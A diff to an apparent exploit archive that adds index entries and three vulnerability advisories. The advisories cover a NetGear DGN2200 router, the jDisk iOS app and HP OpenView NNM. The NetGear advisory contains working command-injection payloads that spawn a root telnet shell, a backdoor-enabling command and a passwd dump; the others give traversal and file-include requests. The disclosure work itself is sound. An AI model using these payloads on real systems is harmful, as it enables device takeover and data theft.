diff --git a/files.csv b/files.csv
index bd4b28e43..4e5a32781 100755
--- a/files.csv
+++ b/files.csv
@@ -28399,3 +28399,27 @@ id,file,description,date,author,platform,type,port
31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0
31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 'COUNT' Parameter Integer Overflow Vulnerability",2008-04-21,"Core Security Technologies",osx,remote,0
31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 'shouts' Cross-Site Scripting Vulnerability",2008-04-04,Y433r,php,webapps,0
+31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0
+31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 'langfile' Parameter Remote File Include Vulnerability",2008-04-04,ZoRLu,php,webapps,0
+31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0
+31618,platforms/hardware/webapps/31618.txt,"jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,hardware,webapps,0
+31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 'TRIGGER' Parameter Denial of Service Vulnerability",2008-04-21,"Rodrigo Carvalho",osx,dos,0
+31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 'ATTACH' Parameter Denial Of Service Vulnerability",2008-04-21,"Core Security Technologies",osx,dos,0
+31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 'sid' Cross-Site Scripting Vulnerability",2008-04-07,syniack,java,webapps,0
+31622,platforms/php/webapps/31622.txt,"URLStreet 1.0 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,php,webapps,0
+31623,platforms/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,php,webapps,0
+31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7.0 Header Handling 'res://' Information Disclosure Vulnerability",2008-04-07,"The Hacker Webzine",windows,remote,0
+31625,platforms/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0
+31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0
+31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 File Descriptor Remote Denial of Service Vulnerability",2008-04-08,"Milen Rangelov",unix,dos,0
+31628,platforms/php/webapps/31628.txt,"Swiki 1.5 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0
+31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 'gid' Parameter SQL Injection Vulnerability",2008-04-09,MantiS,php,webapps,0
+31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection Vulnerability",2008-04-09,OneIdBeagl3,windows,remote,0
+31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon 'functions_portal.php' Remote File Include Vulnerability",2008-04-09,bd0rk,php,webapps,0
+31634,platforms/unix/remote/31634.py,"Python zlib Module Remote Buffer Overflow Vulnerability",2008-04-09,"Justin Ferguson",unix,remote,0
+31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 IMAP Login Data Handling Denial Of Service Vulnerability",2008-04-10,ryujin,windows,dos,0
+31636,platforms/php/webapps/31636.txt,"W2B phpHotResources 'cat.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
+31637,platforms/php/webapps/31637.txt,"W2B Dating Club 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
+31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
+31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0
+31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
diff --git a/platforms/hardware/webapps/31617.txt b/platforms/hardware/webapps/31617.txt
new file mode 100755
index 000000000..6cb594b38
--- /dev/null
+++ b/platforms/hardware/webapps/31617.txt
@@ -0,0 +1,475 @@
+Title: Multiple vulnerabilities in NETGEAR N300 WIRELESS ADSL2+ MODEM ROUTER DGN2200
+====================================================================================
+
+ Notification Date: 11 February 2014
+ Affected Vendor: NetGear
+ Affected Hardware: NetGear DGN2200 N300 Wireless ADSL2+ Modem Router
+ Firmware Version: V1.0.0.36-7.0.37
+ Issue Types: * Command Injection
+ * Cross-site Request Forgery
+ * UPNP Exploitation through Cross-site Request Forgery
+ * Insecure FTP Root
+ * Cannot Disable WPS
+ * Passwords Stored in Plaintext
+ * Information Disclosure
+ * Firmware Update MITM
+ Advisory Code: AIS-2014-003
+ Discovered by: Andrew Horton
+ Issue status: No patch available - product beyond End of Life
+
+
+Summary
+=======
+BAE Systems Applied Intelligence researcher, Andrew Horton has identified that the NetGear N300 Wireless ADSL 2+ Modem Router model DGN2200 suffers from multiple vulnerabilities which may be exploited by both local and remote attackers. This enables an attacker to completely compromise the device and stage further attacks against the local network and internet.
+
+NetGear have indicated that this product is beyond its end of life and therefore these vulnerabilities will not be patched. As a result, BAE Systems have delayed release of this advisory for over 12 months to reduce the likelihood of active exploitation.
+
+
+1. UPNP Vulnerable to CSRF
+===========================
+
+Requires
+--------
+Luring an unauthenticated or authenticated user to an attacker-controlled webpage.
+
+
+Description
+-----------
+The Universal Plug and Play (UPNP) implementation used by NetGear accepts an HTTP POST request as a valid XML request, rendering the UPNP service vulnerable to inter-protocol Cross-Site Request Forgery attacks. This can be used to bypass or alter firewall rules.
+
+The UPNP interface of the router listens on TCP port 5000 and can only be accessed from the LAN side of the device. UPNP requests do not require authentication with passwords. This vulnerability exists because the request is initiated by a user's browser on the LAN side of the device.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to add new firewall rules to enable internet access to the insecure telnet port and the admin web interface.
+
+
+Proof of concept
+----------------
+The following webpage will make telnet for the router accessible to the internet so that it may be attacked using the GearDog backdoor (See issue 5). The GearDog backdoor is a known remote access backdoor implemented in many NetGear products. This requires brute-forcing the MAC address.
+
+
+
+
+
+
+Note: 192.168.0.1 is the default LAN IP address. Port 23 is the internal port number and port 887 is the external port number to be opened.
+
+
+Solution
+--------
+Ensure that UPNP requests sent through HTTP POST parameters are not honoured.
+
+
+
+2. Command Execution with Ping
+===============================
+
+Requires
+--------
+Authenticated access to the web administration interface.
+
+
+Description
+-----------
+The ping function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system as the root user.
+
+
+Proof of concept
+----------------
+Example exploitation to obtain a file and directory listing:
+
+ POST /ping.cgi HTTP/1.1
+ Host: 192.168.0.1
+ Proxy-Connection: keep-alive
+ Content-Length: 81
+ Cache-Control: max-age=0
+ Authorization: Basic YWRtaW46YXBwbGU3ODE=
+ Origin: http://192.168.0.1
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
+ Content-Type: application/x-www-form-urlencoded
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Referer: http://192.168.0.1/DIAG_diag.htm
+ Accept-Encoding: gzip,deflate,sdch
+ Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
+
+ IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls
+
+To get an interactive shell,
+
+1. Send the following POST data:
+IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
+2. Telnet to port 90
+
+
+Solution
+--------
+Validate untrusted user input using a whitelist of acceptable values. For example, IPv4 address values may only include the digits '0' through '9', and full stops ('.')
+
+
+
+3. Blind Command Execution with DNS Lookup
+===========================================
+
+Requires
+--------
+Authenticated access to the web administration interface.
+
+
+Description
+-----------
+The DNS lookup function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system but was unable to see the response.
+
+
+Proof of concept
+----------------
+Example exploitation demonstrating the issue through use of the ?sleep? command to delay the response from the server:
+
+ POST /dnslookup.cgi HTTP/1.1
+ Host: 192.168.0.1
+ Proxy-Connection: keep-alive
+ Content-Length: 32
+ Cache-Control: max-age=0
+ Authorization: Basic YWRtaW46YXBwbGU3ODE=
+ Origin: http://192.168.0.1
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
+ Content-Type: application/x-www-form-urlencoded
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Referer: http://192.168.0.1/DIAG_diag.htm
+ Accept-Encoding: gzip,deflate,sdch
+ Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
+
+ host_name=|sleep 5&lookup=Lookup
+
+To get an interactive shell,
+
+1. Send the following POST data:
+hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup
+2. Telnet to port 90
+
+
+Solution
+--------
+Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops (?.?) and hyphens ('-').
+
+
+
+4. No Cross-Site Request Forgery (CSRF) Protection
+===================================================
+
+Requires
+--------
+Luring a logged in admin user into following a malicious link
+
+
+Description
+-----------
+An attacker can lure a user into following an untrusted link to a malicious webpage that will exploit the lack of CSRF protection by forcing the user's web browser to perform unwanted actions, such as altering firewall rules. This attack returns no information to the attacker, so it is effectively 'blind', however this does not detract from the threat.
+
+The command execution vulnerabilities described above can be performed through CSRF.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to update configuration of the device, including changing WPA keys, alter firewall rules and perform command execution through exploitation of the ping and DNS features.
+
+
+Solution
+--------
+Include an anti-CSRF token in all web forms and ensure that the token is present and correct when HTTP requests for actions are received.
+
+
+
+5. Gearguy/Geardog Telnet Backdoor
+===================================
+
+Requires
+--------
+Ability to telnet to port 23 (only on LAN side by default)
+
+
+Description
+-----------
+There is a backdoor (feature) built into many NetGear devices, where a user can gain operating system command access without requiring a password. This issue has been previously reported in other NetGear devices.
+
+NetGear provides a windows executable to do this. A Linux client is available from http://code.google.com/p/netgear-telnetenable/
+
+Send a Blowfish encrypted message to port 23 from the LAN. When you reconnect, it provides a shell without a password required.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to gain a root shell on the underlying Linux operating system without supplying any authentication credentials. This would allow complete device compromise, which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
+
+
+Proof of concept
+----------------
+python telnet-enabler.py 192.168.0.1 "204E7F2172C8" Gearguy Geardog
+Sent telnet enable payload to '192.168.0.1:23'
+
+
+Solution
+--------
+Remove the backdoor feature from the device. If a ?last resort? admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function.
+
+
+
+6. FTP Insecure Root Directory
+===============================
+
+Requires
+--------
+FTP to be enabled (not enabled by default)
+
+
+Description
+-----------
+The FTP server allows a user to access configuration files and to traverse outside the folder that contains files intended to be shared by FTP.
+It is possible to list and retrieve files in the / folder, however the user is restricted from using the cd or CWD command to change the current directory to '/'.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to gain access to sensitive configuration files.
+
+
+Proof of concept
+----------------
+ root@bt# ftp 192.168.0.1
+ Connected to 192.168.0.1.
+ 230 User logged in.
+ Name (192.168.0.1:root): ftp
+ 230 User logged in.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT 192.168.0.6:49211 OK
+ 150 BINARY data connection established.
+ lrwxrwxrwx 1 nobody root 18 Jan 01 2003 USB_Storage
+ 226 Directory list has been submitted.
+ ftp> cd /
+ 550 Error: Access Denied.
+ ftp> ls /
+ 200 PORT 192.168.0.6:55927 OK
+ 150 BINARY data connection established.
+ -rw-r--r-- 1 nobody root 2 Jan 01 2003 all_no_password
+ -rw-r--r-- 1 nobody root 1700 Jan 01 2003 bftpd.conf
+ drwxr-xr-x 3 nobody root 0 Jan 01 2003 conf
+ -rw-r--r-- 1 nobody root 2 Jan 01 2003 lan3_time
+ -r--r--r-- 1 nobody root 1430 Jan 01 2003 lan_dev
+ -rw-r--r-- 1 nobody root 2 Jan 01 2003 lan_time
+ drwxr-xr-x 48 nobody root 0 Jan 01 2003 mnt
+ -rw-r--r-- 1 nobody root 1 Jan 01 2003 opendns.flag
+ -rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns.tbl
+ -rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns_auth.tbl
+ drwxr-xr-x 2 nobody root 0 Jan 01 2003 ppp
+ -rw-r--r-- 1 nobody root 38 Jan 01 2003 resolv.conf
+ -rw-r--r-- 1 nobody root 208 Jan 01 2003 ripd.conf
+ drwxr-xr-x 4 nobody root 0 Jan 01 2003 samba
+ drwxr-xr-x 2 nobody root 0 Jan 01 2003 shares
+ -rw-r--r-- 1 nobody root 262 Jan 01 2003 space_info
+ -rw------- 1 nobody root 2 Oct 14 14:15 timesync
+ -rw-r--r-- 1 nobody root 242 Jan 01 2003 udhcpd.conf
+ -rw-r--r-- 1 nobody root 0 Jan 01 2003 udhcpd.leases
+ -rw-r--r-- 1 nobody root 4 Jan 01 2003 udhcpd.pid
+ -rw-r--r-- 1 nobody root 2 Jan 01 2003 udhcpd_resrv.conf
+ -rw-r--r-- 1 nobody root 3562 Jan 01 2003 upnp_xml
+ drwxr-xr-x 2 nobody root 0 Jan 01 2003 usb_vol_name
+ drwxr-xr-x 11 nobody root 0 Jan 01 2003 var
+ -r--r--r-- 1 nobody root 1922 Jan 01 2003 wan_dev
+ -rw-r--r-- 1 nobody root 3 Jan 01 2003 wan_time
+ drwxr-xr-x 2 nobody root 0 Jan 01 1999 wlan
+ -rw-r--r-- 1 nobody root 2 Jan 01 2003 wlan_time
+ -rw-r--r-- 1 nobody root 0 Jan 01 2003 zebra.conf
+ 226 Directory list has been submitted.
+ ftp>
+ ftp> get /bftpd.conf
+ local: ./bftpd.conf remote: /bftpd.conf
+ 200 PORT 192.168.0.5:53750 OK
+ 150 BINARY data connection established.
+ 226 File transmission successful.
+ 1454 bytes received in 0.00 secs (3256.7 kB/s)
+
+
+Solution
+--------
+Enforce the folder restriction to the /shares folder for all FTP commands.
+
+
+
+7. Cannot Disable WPS
+======================
+
+Requires
+--------
+Local proximity and WiFi enabled
+
+
+Description
+-----------
+Wi-Fi Protected Setup (WPS) is an insecure protocol vulnerable to bruteforce attacks due to design vulnerabilities. The NetGear device does not provide an effective method to disable WPS. An attacker with local proximity to the device while WiFi is enabled, can bruteforce WPS, and obtain the WPA key which allows an attacker to connect to the WiFi access point, and decrypt WiFi traffic from other users.
+
+Software such as Reaver, can be used to brute-force the WPS key, usually within about ten hours. Reaver is available from http://code.google.com/p/reaver-wps.
+
+The 'Advanced Wireless Settings' page contains the following section:
+ WPS Settings
+ Router's PIN: 99999999
+ [Tickbox] Disable Router's PIN
+ [Tickbox] Keep Existing Wireless Settings
+
+ Ticking the 'Disable Router's PIN' box appears to have no effect.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to crack the wireless password, and gain access to the WPA2 PSK wireless network hosted by the device.
+
+
+Proof of concept
+----------------
+This vulnerability can be exploited with the Reaver tool available from http://code.google.com/p/reaver-wps/.
+
+
+Solution
+--------
+Implement a method for users to easily and effectively disable WPS.
+
+
+
+8. Passwords Stored in Plaintext
+=================================
+
+Requires
+--------
+Telnet access or exploitation of a vulnerability providing command execution
+
+
+Description
+-----------
+The router stores passwords in the /etc/passwd file in plaintext instead of using encrypted hashes.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to learn the passwords used to access the device.
+
+
+Proof of concept
+----------------
+# cat /etc/passwd
+nobody:*:0:0:nobody:/:/bin/sh
+admin:s3cr3tp4ssw0rd:0:0:admin:/:/bin/sh
+guest:guest:0:0:guest:/:/bin/sh
+
+
+Solution
+--------
+Store user passwords as a non-reversible cryptographic hash, such as SHA-256.
+
+
+
+9. Pre-Authentication Information Disclosure
+=============================================
+
+Requires
+--------
+Unauthenticated access to the web interface
+
+
+Description
+-----------
+This issue has been previously reported in other NetGear devices and is the same issue reported here:
+* http://websec.mx/advisories/view/Revelacion_de_informacion_en_Netgear
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to learn some identifying features of the device without needing to provide credentials.
+
+
+Proof of concept
+----------------
+URL: http://192.168.0.1/currentsetting.htm
+Firmware=V1.0.0.36_7.0.36
+RegionTag=DGN2200_WW
+Region=ww
+Model=DGN2200
+InternetConnectionStatus=Up
+ParentalControlSupported=1
+
+
+Solution
+--------
+Restrict access to webpages containing sensitive functionality or data to authenticated users.
+
+
+
+10. Firmware Update Vulnerable to Man In The Middle
+===================================================
+
+Requires
+--------
+Control of the user?s network, for example at the ISP level or local network.
+
+
+Description
+-----------
+Each time an admin logs into the web interface, the web interface attempts to find new firmware on an FTP server.
+
+FTP is an insecure protocol that is vulnerable to man-in-the-middle attacks. An attacker could provide a backdoored version of the firmware.
+
+Updates are sourced from: ftp://14.0.34.208/dgn2200/ww/
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to provide a malicious firmware image to the router.
+
+
+Solution
+--------
+Retrieve updates using a protocol with SSL/TLS with certificate validation.
+Apply a public key signature to firmware images and check them before usage.
+
+
+
+End User Recommendation
+=======================
+Replace your NetGear router with a more recent model that can receive updated firmware.
+
+
+Disclosure Time-Line
+====================
+29/11/2012 - Vendor notified
+6/12/2012 - Vendor acknowledges vulnerabilities but advises that the product is beyond its end of life and will not be patched
+11/2/2014 - Advisory released
+
+
+Contact
+====================
+Advisory URL: http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-%28AIS-2014
+
+Website: www.baesystems.com
diff --git a/platforms/hardware/webapps/31618.txt b/platforms/hardware/webapps/31618.txt
new file mode 100755
index 000000000..abc71bcb5
--- /dev/null
+++ b/platforms/hardware/webapps/31618.txt
@@ -0,0 +1,302 @@
+Document Title:
+===============
+jDisk (stickto) v2.0.3 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1196
+
+
+Release Date:
+=============
+2014-02-12
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1196
+
+
+Common Vulnerability Scoring System:
+====================================
+9.4
+
+
+Product & Service Introduction:
+===============================
+jDisk turns your iPhone`iPad`iPod into a flash drive / disk. jDisk provides a purely web-based management UI, what you
+need do is visit it in your browser, no client installation is needed. What`s more, jDisk embeds a native file manager,
+you can organize your files/folders on your device directly, open files, edit them, preview them, etc. All in all, jDisk
+empowers your iPhone/iPad, make it work as a moving disk / flash drive.
+
+(Copy of the Homepage: https://itunes.apple.com/de/app/jdisk-convert-your-device/id604793088 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-02-12: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Apple AppStore
+Product: jDisk (stickto) iOS - Mobile Web Application 2.0.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Critical
+
+
+Technical Details & Description:
+================================
+1.1
+Multiple remote code execution web vulnerabilities has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+The vulnerability allows remote attackers to execute unauthorized system specific codes or commands to compromise the affected system/service.
+
+The vulnerabilities are located in the `New+ Text file` and `New+ Folder` function of the jdisk wifi application file manager web-interface.
+Remote attackers are able to inject own system specific codes by manipulation of the folder- & file name value in the add procedure.
+The code execution occurs in the main file dir index and sub category listing, the add new edit file but also in the the app status
+notification message context. The security risk of the remote code execution vulnerabilities in the add new folder- & text file function
+are estimated as critical with a cvss (common vulnerability scoring system) count of 9.4(+)|(-)9.5.
+
+Exploitation of the code execution vulnerability requires no user interaction or privileged mobile web-application user account with password.
+Successful exploitation of the remote code execution vulnerabilities results in mobile application or connected device component compromise.
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Module(s):
+ [+] New/Add Folder
+ [+] New/Add Text File
+
+Vulnerable Parameter(s):
+ [+] folder name
+ [+] text-file name
+
+Affected Module(s):
+ [+] Index & Sub Category - File Dir Listing
+ [+] Notification Message
+ [+] File Edit - Header
+
+
+1.2
+A directory-traversal web vulnerability has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+The vulnerability allows remote attackers to unauthorized access system path variables or web-server data to compromise the application.
+
+The local vulnerability is located in the `folderContent to folder` value of the mobile application. Remote attackers can exploit the bug
+by usage of a manipulated GET method request to unauthorized access app/device paths or folders. The local issue is a classic directory-traversal
+web vulnerability. The execution of the malicious dt string in the foldercontent to folder path request occurs in the context of the requested
+interface page itself. The security risk of the directory traversal web vulnerability is estimated as high(-) with a cvss (common vulnerability
+scoring system) count of 6.6(+)|(-)6.7.
+
+Exploitation of the directory traversal web vulnerability requires no user interaction or privileged mobile web-application user account with password.
+Successful exploitation of the path traversal web vulnerability results in mobile application or connected device component compromise.
+
+Request Method(s):
+ [+] [GET]
+
+Vulnerable Module(s):
+ [+] __FD__?action
+
+Vulnerable Parameter(s):
+ [+] folderContent&folder=
+
+Affected Module(s):
+ [+] Index & Sub Category - File Dir Listing
+
+
+
+1.3
+A local file include web vulnerability has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
+specific path commands to compromise the web-application or mobile device.
+
+The web vulnerability is located in the `file name` value of the `Upload > Uplaod Files` module POST method request. Remote attackers
+are able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the
+request method is POST. The local file/path include execution occcurs in the main file dir index- or sub category item listing of
+the file manager. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability
+scoring system) count of 8.3(+)|(-)8.4.
+
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account
+with password. Successful exploitation of the local web vulnerability results in mobile application or connected device component
+compromise by unauthorized local file include web attacks.
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Input(s):
+ [+] Upload > Upload Files
+
+Vulnerable Parameter(s):
+ [+] filename
+
+Affected Module(s):
+ [+] Index File Dir Item Listing
+ [+] Sub Category File Dir Item Listing
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The remote code execution can be exploited by remote attackers without privileged web-application user account or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:12345/__FD__?action=saveFile&path=[VULNERABLE CODE EXECUTION VALUE!] Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Gr??e des Inhalts[86] Mime Type[text/html]
+ Request Header:
+ Host[localhost:12345]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Content-Type[application/json; charset=UTF-8]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:12345/]
+ Content-Length[14]
+ Cookie[jtable%2376270709page-size=10]
+ Connection[keep-alive]
+ Pragma[no-cache]
+ Cache-Control[no-cache]
+ POST-Daten:
+ {"content":"&path=[VULNERABLE CODE EXECUTION VALUE!]"}[]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[86]
+ Content-Type[text/html]
+ Date[Tue, 11 Feb 2014 23:11:06 GMT]
+
+
+1.2
+The directory-traversal vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.
+
+PoC:
+http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825
+
+#{"msg":"","success":true,"data":[{"name":"%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","id":"/%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","type":"file",
+"size":24386,"changed":"2014-02-12 00:13:49","created":"2014-02-12 00:13:49"}]}
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[35] Mime Type[text/html]
+ Request Header:
+ Host[localhost:12345]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Cookie[jtable%2376270709page-size=10]
+ Connection[keep-alive]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[35]
+ Content-Type[text/html]
+ Date[Tue, 11 Feb 2014 23:14:46 GMT]
+
+
+
+
+1.3
+The file include vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.
+
+PoC:
+
+
+
+>"<[LOCAL FILE INCLUDE VULNERABILITY!].txt">[LOCAL FILE INCLUDE VULNERABILITY!].jpg
\ No newline at end of file
diff --git a/platforms/windows/remote/31638.txt b/platforms/windows/remote/31638.txt
new file mode 100755
index 000000000..356626615
--- /dev/null
+++ b/platforms/windows/remote/31638.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28745/info
+
+HP OpenView Network Node Manager is prone to multiple vulnerabilities affecting the 'ovalarmsrv.exe' and 'ovtopmd.exe' processes. These issues include a directory-traversal issue and multiple denial-of-service issues.
+
+UPDATE (April 14, 2008): Secunia Research discovered, independently, that the 'OpenView5.exe' process is also prone to the directory-traversal issue; this affects Network Node Manager 7.51. Note that 'ovalarmsrv.exe' may also be named 'OpenView5.exe'.
+
+Attackers can exploit these issues to access potentially sensitive data on the affected computer or to deny service to legitimate users.
+
+HP OpenView Network Node Manager 7.53 is vulnerable; other versions may also be affected.
+
+http://www.example.com/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini